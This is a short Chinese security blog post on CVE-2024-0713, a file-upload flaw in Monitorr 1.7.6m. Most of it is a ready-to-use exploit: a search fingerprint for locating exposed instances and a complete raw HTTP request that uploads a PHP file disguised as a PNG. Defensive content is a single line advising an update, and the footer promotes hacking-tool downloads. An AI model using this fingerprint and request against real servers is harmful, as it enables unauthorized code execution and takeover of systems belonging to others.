正文

叮~你有新的速递!CVE-2024-0713 漏洞(附EXP)

admin
admin V管理员 /0 评论 /558 阅读
0202
此篇文章发布距今已超过639天,您需要注意文章的内容或图片是否可用!

0x01 前言

   Monitorr是一个实时显示任何网络应用程序或服务状态的网络前端,该系统存在文件上传漏洞,通过该漏洞可以获取服务器权限

0x02 影响平台

Monitorrv1.7.6m

0x03 漏洞复现

搜索语法

icon_hash="-211006074"

页面是这个酱紫

EXP如下:

POST /assets/php/upload.php HTTP/1.1Host: ip:portContent-Length: 412Accept: text/plain, */*; q=0.01X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5799.196 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMmx988TUuintqO4QOrigin: http://127.0.0.1Referer: http://127.0.0.1/assets/php/monitorr-services_settings.phpAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close------WebKitFormBoundaryMmx988TUuintqO4QContent-Disposition: form-data; name="fileToUpload"; filename="2.php"Content-Type: image/png<?php phpinfo();?>------WebKitFormBoundaryMmx988TUuintqO4Q--

Success~

0x04 修复方案

建议及时更新至最新版本!


推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
宙飒天下